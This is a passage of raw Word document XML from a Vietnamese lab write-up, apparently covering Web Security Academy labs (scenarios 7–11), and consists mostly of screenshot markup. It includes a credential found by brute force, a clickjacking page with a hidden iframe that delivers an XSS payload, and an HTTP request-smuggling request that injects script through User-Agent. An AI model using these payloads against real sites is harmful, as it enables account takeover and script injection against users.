          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA30FFA" wp14:editId="60F7DB06">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="148798957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9571" name="Picture 1" descr="Graphical user interface, application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3A24" w14:textId="29E5058C" w:rsidR="00C9190A" w:rsidRDefault="00C9190A" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E80B9F" w14:textId="0A1439B1" w:rsidR="00C9190A" w:rsidRDefault="00930C4E" w:rsidP="00930C4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5F61F" w14:textId="403D6402" w:rsidR="00930C4E" w:rsidRDefault="00930C4E" w:rsidP="00930C4E"/>
    <w:p w14:paraId="0E32733A" w14:textId="7634E341" w:rsidR="007F6252" w:rsidRDefault="00FD15B7" w:rsidP="00930C4E">
      <w:r w:rsidRPr="00FD15B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589B85DE" wp14:editId="5AE5181C">
            <wp:extent cx="6115050" cy="2760345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="57177797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7971" name="Picture 1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9B1" w14:textId="4E0C8C2C" w:rsidR="009F050A" w:rsidRDefault="009F050A" w:rsidP="00930C4E"/>
    <w:p w14:paraId="526A48F4" w14:textId="240A0202" w:rsidR="009F050A" w:rsidRDefault="009F050A" w:rsidP="00930C4E">
      <w:r w:rsidRPr="009F050A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EFBBD5A" wp14:editId="1AA594A7">
            <wp:extent cx="6115050" cy="4627245"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="174748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836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2284" w14:textId="77777777" w:rsidR="00FD15B7" w:rsidRPr="00930C4E" w:rsidRDefault="00FD15B7" w:rsidP="00930C4E"/>
    <w:p w14:paraId="16F19D92" w14:textId="498DE82B" w:rsidR="00E065D6" w:rsidRDefault="009F050A" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F050A">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6600A43B" wp14:editId="418294A9">
            <wp:extent cx="6115050" cy="3579495"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="32408784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7840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8C1E" w14:textId="1359199A" w:rsidR="009F050A" w:rsidRDefault="009F050A" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F050A">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C37DE71" wp14:editId="7A156DD4">
            <wp:extent cx="6115050" cy="3926840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="206076770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67702" name="Picture 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EFBC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5BEBBAF4" wp14:editId="7D700ED5">
            <wp:extent cx="3686689" cy="514422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197634133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1334" name="Picture 1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9B5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040DA157" wp14:editId="420CB760">
            <wp:extent cx="6115050" cy="3983990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18149340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405" name="Picture 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99CD" w14:textId="77777777" w:rsidR="005017F5" w:rsidRPr="005017F5" w:rsidRDefault="005017F5" w:rsidP="005017F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BE09AF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21340019" wp14:editId="4AFB4E6C">
            <wp:extent cx="6115050" cy="4597400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43195724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7246" name="Picture 1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3C77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</w:rPr>
        <w:t>username=apache&amp;password=chelsea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54533A32" w14:textId="139E449C" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="005017F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005017F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7930AE71" wp14:editId="196CFCA4">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="53235505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5058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C347" w14:textId="50B3FA87" w:rsidR="00B559CF" w:rsidRDefault="00B559CF" w:rsidP="00B559CF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC70C0" w14:textId="182717DC" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECB0A7C" w14:textId="7FCA797A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15A33A3B" wp14:editId="5BC1BF10">
            <wp:extent cx="6115050" cy="2987675"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="164918297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8297" name="Picture 1" descr="A picture containing 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AF51" w14:textId="120644CF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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="327D568D" wp14:editId="78C0A852">
            <wp:extent cx="6115050" cy="2151380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="14636263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632" name="Picture 1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65C9" w14:textId="4266A1F9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2D826191" wp14:editId="16F8A1AC">
            <wp:extent cx="6115050" cy="2784475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="185059755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97558" name="Picture 1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3C5" w14:textId="77777777" w:rsidR="00693158" w:rsidRDefault="00693158" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645D76BD" w14:textId="7477C65B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2CCB5119" wp14:editId="1ABC3C6B">
            <wp:extent cx="6115050" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182318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837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92C3" w14:textId="703089EB" w:rsidR="00693158" w:rsidRDefault="00693158" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1128008C" w14:textId="5DD69549" w:rsidR="00693158" w:rsidRDefault="00126170" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126170">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B5B659E" wp14:editId="34287C1F">
            <wp:extent cx="6115050" cy="3083560"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="15868576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766" name="Picture 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E18" w14:textId="4CC442B9" w:rsidR="005173B9" w:rsidRDefault="005173B9" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005173B9">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20408B66" wp14:editId="2374C761">
            <wp:extent cx="6115050" cy="308610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172522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283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4391" w14:textId="0EA172B6" w:rsidR="00126170" w:rsidRDefault="00126170" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="498A5597" wp14:editId="23DAC1ED">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="224142860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2860" name="Picture 1" descr="Graphical user interface, application, websit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E8ED" w14:textId="77777777" w:rsidR="00C57C31" w:rsidRDefault="00C57C31" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECE372B" w14:textId="27B72294" w:rsidR="00693158" w:rsidRDefault="005173B9" w:rsidP="005173B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B65E4F" w14:textId="11FBF888" w:rsidR="00C57C31" w:rsidRDefault="00C57C31" w:rsidP="00C57C31">
      <w:r w:rsidRPr="00C57C31">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24281411" wp14:editId="1E11E962">
            <wp:extent cx="6115050" cy="4585970"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="18546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32751" name="Picture 1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3C78" w14:textId="687820D8" w:rsidR="00C57C31" w:rsidRDefault="00C57C31" w:rsidP="00C57C31">
      <w:r w:rsidRPr="00C57C31">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06EB5406" wp14:editId="1B50090E">
            <wp:extent cx="6115050" cy="645795"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="107407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76799" name="Picture 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F89A" w14:textId="2F273712" w:rsidR="00970FC9" w:rsidRDefault="00970FC9" w:rsidP="00C57C31">
      <w:r w:rsidRPr="00970FC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E787D1E" wp14:editId="3F6497A1">
            <wp:extent cx="4115374" cy="714475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="99625537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55376" name="Picture 1" descr="A picture containing shap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B63" w14:textId="1119CA04" w:rsidR="00C57C31" w:rsidRDefault="00970FC9" w:rsidP="00C57C31">
      <w:r w:rsidRPr="00970FC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5923A9FF" wp14:editId="483D7327">
            <wp:extent cx="5401429" cy="1657581"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="21372750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75018" name="Picture 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CB8" w14:textId="66C96F7E" w:rsidR="00970FC9" w:rsidRDefault="00526F7F" w:rsidP="00C57C31">
      <w:r w:rsidRPr="00526F7F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3C08E8" wp14:editId="521ABCCA">
            <wp:extent cx="6115050" cy="1549400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35495212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2122" name="Picture 1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402" w14:textId="78966C1A" w:rsidR="00526F7F" w:rsidRDefault="00526F7F" w:rsidP="00C57C31">
      <w:r w:rsidRPr="00526F7F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594E3190" wp14:editId="740D4B53">
            <wp:extent cx="6115050" cy="2595245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65316623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6238" name="Picture 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18F" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00102205" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">  iframe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5CFD8" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    position: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>relative;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42334386" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    width: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1000px;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43B239B3" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    height: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>900px;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="275C5D5F" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    opacity: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0.00001;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D76DB15" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    z-index: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73BF78BC" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387C8C6" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">  div {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2E0CCD" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    position: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>absolute;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10ADE925" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    top: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>815px;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7AD5EDA8" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    left: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>80px;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C0B2F3A" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">    z-index: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="541FC52C" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC019F" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50372C65" w14:textId="77777777" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:t>&lt;div&gt;Click for prize&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36FC7A" w14:textId="3447EF0E" w:rsidR="00A26703" w:rsidRDefault="00A26703" w:rsidP="00A26703">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;iframe src="https://0ad2009603d777148013a3f9002900f6.web-security-academy.net/feedback?name=&lt;img src=1 onerror=print()&gt;&amp;email=123@mail.com&amp;message=123&amp;subject=123"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AAAFF9" w14:textId="263015D5" w:rsidR="000D5B0C" w:rsidRDefault="000D5B0C" w:rsidP="00A26703">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F965165" wp14:editId="509CB09B">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="14835052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05233" name="Picture 1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58F5" w14:textId="0FDD51A3" w:rsidR="000D5B0C" w:rsidRDefault="000D5B0C" w:rsidP="00A26703">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="372B9576" wp14:editId="520B2027">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1516932075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32075" name="Picture 1" descr="Graphical user interface, websit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890C" w14:textId="4D74A5B3" w:rsidR="000D5B0C" w:rsidRDefault="000D5B0C" w:rsidP="00A26703"/>
    <w:p w14:paraId="0F05AF54" w14:textId="5CFBB0E5" w:rsidR="00DE52B6" w:rsidRDefault="00DE52B6" w:rsidP="00DE52B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F59F7" w14:textId="77777777" w:rsidR="009E02E9" w:rsidRDefault="009E02E9" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FAB634" w14:textId="77777777" w:rsidR="009E02E9" w:rsidRDefault="009E02E9" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BA64F1" w14:textId="4FD3A28D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lastRenderedPageBreak/>
        <w:t>POST / HTTP/</w:t>
      </w:r>
      <w:r w:rsidR="004E773D">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF77C0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Host: 0a79002c0352849884bb5b58002700a1.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A61C083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Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23235189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Length: 148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBB67C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 xml:space="preserve">Transfer-Encodeing: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E02E9">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>chunked</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F9471FC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7CE5C090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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1519436F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053CBB31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GET /post?postId=7 HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E5ED51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User-Agent: a"/&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E02E9">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E02E9">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CDFDD6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Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FEA89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Length: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012563EA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144347DF" w14:textId="20B17D26" w:rsidR="006C5BFB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x=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541AF192" w14:textId="4ED8A0D7" w:rsidR="00E555F2" w:rsidRDefault="00E555F2" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EF71049" wp14:editId="37F8621C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="83111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112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3BAF" w14:textId="6EC127A0" w:rsidR="00E555F2" w:rsidRDefault="00E555F2" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="031A1E37" wp14:editId="343E77CB">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="38637492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74924" name="Picture 1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C83F" w14:textId="77777777" w:rsidR="00E555F2" w:rsidRDefault="00E555F2" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C707DE8" w14:textId="0BF18578" w:rsidR="00E555F2" w:rsidRDefault="00E555F2" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39E21B19" wp14:editId="1260CB49">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="565067560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67560" name="Picture 1" descr="Graphical user interface, application, Word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07A4" w14:textId="77777777" w:rsidR="00E555F2" w:rsidRDefault="00E555F2" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E639C1A" w14:textId="6CF5A1A9" w:rsidR="00E555F2" w:rsidRDefault="00E555F2" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2647BB9E" wp14:editId="0309042B">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1529337588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37588" name="Picture 1" descr="Graphical user interface, websit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E6CB" w14:textId="1E00623F" w:rsidR="005516C0" w:rsidRDefault="005516C0" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C234C9" w14:textId="1D111D1E" w:rsidR="00DE285C" w:rsidRDefault="00DE285C" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3496BFDF" w14:textId="164B9BCA" w:rsidR="00DE285C" w:rsidRDefault="00DE285C" w:rsidP="009E02E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA45CB0" w14:textId="23F94065" w:rsidR="00DE285C" w:rsidRDefault="00DE285C" w:rsidP="00DE285C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF80A50" w14:textId="77777777" w:rsidR="00C20E5D" w:rsidRDefault="00C20E5D" w:rsidP="00DE285C"/>
    <w:p w14:paraId="2C2817AB" w14:textId="29B08232" w:rsidR="00DE285C" w:rsidRDefault="00C20E5D" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F97E15E" wp14:editId="13819AE0">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="180139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9234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778D" w14:textId="7C1A4FAF" w:rsidR="00C20E5D" w:rsidRDefault="00C20E5D" w:rsidP="00DE285C"/>
    <w:p w14:paraId="186FE955" w14:textId="5FDEB765" w:rsidR="00C20E5D" w:rsidRDefault="00C20E5D" w:rsidP="00DE285C">
